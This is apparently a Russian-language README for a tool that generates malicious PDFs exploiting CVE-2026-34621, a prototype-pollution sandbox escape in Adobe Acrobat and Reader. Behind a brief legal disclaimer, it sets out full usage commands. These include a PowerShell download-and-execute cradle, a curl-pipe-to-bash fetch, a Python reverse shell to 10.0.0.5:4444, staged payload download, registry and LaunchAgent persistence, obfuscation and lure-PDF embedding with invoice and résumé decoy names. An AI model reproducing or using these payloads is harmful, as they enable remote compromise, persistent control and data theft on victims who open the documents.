
Сложный кроссплатформенный генератор эксплойтов для **CVE-2026-34621** — критической уязвимости загрязнения прототипа в Adobe Acrobat и Reader, которая приводит к обходу песочницы и произвольному выполнению кода в Windows и macOS.
Сложный кроссплатформенный генератор эксплойтов для CVE-2026-34621 — критической уязвимости загрязнения прототипа в Adobe Acrobat и Reader, которая приводит к обходу песочницы и выполнению произвольного кода в Windows и macOS.
⚠️ ВАЖНОЕ ПРЕДУПРЕЖДЕНИЕ
Этот инструмент предназначен только для авторизованных исследований в области безопасности и пентеста.
Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет явного письменного разрешения, является незаконным. Автор не несёт ответственности за неправомерное использование.
CVE-2026-34621 — это уязвимость нулевого дня в Adobe Acrobat и Reader, которая позволяет атакующему:
Этот генератор создаёт вредоносный PDF-файл, который при открытии в уязвимой версии Adobe Reader автоматически выполняет полезную нагрузку, адаптированную под операционную систему жертвы.
Поддерживаемые целевые платформы:
| Категория | Возможности |
|---|---|
| Кроссплатформенные полезные нагрузки | Автоматическое определение ОС и выбор соответствующего метода выполнения команд Windows или macOS. |
| Несколько векторов выполнения | cmd.exe, PowerShell, WScript.Shell (Windows) / Terminal.app, osascript (macOS). |
| Поэтапные полезные нагрузки | Загрузка и выполнение полезных нагрузок второго этапа с удалённого URL-адреса. |
| Постоянство | Установка ключа автозагрузки в реестре (Windows) или LaunchAgent (macOS). |
| Методы обхода | Три уровня обфускации JavaScript, привязка к окружению, задержки выполнения, полиморфный код. |
| Встраивание в PDF-приманку | Объединение эксплойта с легитимно выглядящим PDF-файлом (требуется PyPDF2). |
| Несколько триггеров | OpenAction, действие при открытии страницы или JavaScript на уровне документа. |
| Подробные отчёты | Отчёты в форматах HTML, TXT и JSON с описанием конфигурации полезной нагрузки. |
git clone https://github.com/NULL200OK/CVE-2026-34621-Exploit.git
cd CVE-2026-34621-Exploit
python3 -m venv venv
source venv/bin/activate # Linux/macOS
venv\Scripts\activate # Windows
Основной скрипт использует только стандартную библиотеку Python. Для функции объединения с PDF-приманкой установите PyPDF2:
pip install PyPDF2
Сгенерируйте базовый PDF-файл, который открывает калькулятор в Windows и macOS:
python3 cve_2026_34621_advanced.py -o test.pdf
Будут созданы следующие файлы:
test.pdf — вредоносный PDF-файл.
test_report.html — подробный HTML-отчёт.
test_report.txt — текстовое резюме.
test_config.json — экспорт конфигурации в JSON.
Команды для Windows
1-Сценарий Команда
A-Базовое всплывающее окно calc.exe
python cve_2026_34621_advanced.py -o invoice.pdf --win calc.exe
Обратная оболочка PowerShell
python cve_2026_34621_advanced.py -o contract.pdf --win "powershell -NoP -Ep Bypass -C \"IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.5/shell.ps1')\""
Поэтапная полезная нагрузка с постоянством
python cve_2026_34621_advanced.py -o resume.pdf --win calc.exe --stage http://192.168.1.100/payload.exe -p
Привязка к окружению (запуск только на "SALES-PC")
python cve_2026_34621_advanced.py -o targeted.pdf --win calc.exe -k SALES-PC
С уровнем обфускации 2 и задержкой 10 секунд
python cve_2026_34621_advanced.py -o delayed.pdf --win calc.exe -O 2 -d 10
Команды для macOS
2-Сценарий Команда
Открыть калькулятор
python cve_2026_34621_advanced.py -o invoice.pdf --mac "open /System/Applications/Calculator.app"
Загрузка и выполнение скрипта
python cve_2026_34621_advanced.py -o update.pdf --mac "curl -s http://10.0.0.5/mac_payload.sh | bash"
Обратная оболочка через Python
python cve_2026_34621_advanced.py -o shell.pdf --mac "python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"10.0.0.5\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"
Постоянство через LaunchAgent
python cve_2026_34621_advanced.py -o persist.pdf --mac "open /Applications/Calculator.app" -p
Встраивание в PDF-приманку
python cve_2026_34621_advanced.py -o safe_invoice.pdf -l /path/to/real_invoice.pdf --trigger pageopen
3-Примечание о мобильном тестировании
Сам скрипт запускается на настольных системах (Windows/macOS/Linux) для генерации PDF-файла. Сгенерированный PDF можно открыть на устройствах Android или iOS, но:
Мобильные версии Adobe Acrobat Reader не уязвимы к CVE-2026-34621.
Вместо выполнения системных команд полезная нагрузка запустит безобидный демонстрационный запасной вариант (откроет URL-адрес или покажет предупреждение).
Параметр Описание
-o, --output FILE Обязательный. Имя выходного PDF-файла.
--win CMD Команда Windows для выполнения (по умолчанию: calc.exe).
--mac CMD Команда macOS для выполнения (по умолчанию: open /System/Applications/Calculator.app).
--stage URL URL-адрес для загрузки полезной нагрузки второго этапа.
-p, --persistence Установка механизма постоянства (реестр/LaunchAgent).
-O, --obfuscate LEVEL Уровень обфускации JavaScript (0=нет, 1=базовый, 2=средний, 3=продвинутый).
-d, --delay SECONDS Задержка выполнения на указанное количество секунд.
-k, --key HOSTNAME Привязка к окружению — выполнение только при совпадении имени хоста.
-l, --lure PDF Путь к легитимному PDF-файлу для использования в качестве приманки (объединяет эксплойт).
--trigger TYPE Вектор запуска: openaction, pageopen или doclevel.
--no-reports Пропустить генерацию отчётов HTML/TXT/JSON.
--seed N Установить начальное значение генератора случайных чисел для воспроизводимой полиморфной генерации.
Цепочка атаки
Загрязнение прототипа:
Встроенный JavaScript изменяет Object.prototype для внедрения вредоносных свойств (__trusted, privileged и т. д.). Это нарушает границу доверия JavaScript-движка Adobe.
Повышение контекста
Из-за загрязнённого прототипа движок ошибочно обрабатывает недоверенный JavaScript документа так, как если бы он выполнялся в привилегированном контексте.
Доступ к привилегированным API
Скрипт теперь может вызывать ограниченные API, такие как app.launchURL, util.readFileIntoStream и app.trustedFunction.
Обход песочницы
Эти API обеспечивают доступ к файловой системе и выполнение процессов за пределами песочницы Adobe.
Выполнение произвольного кода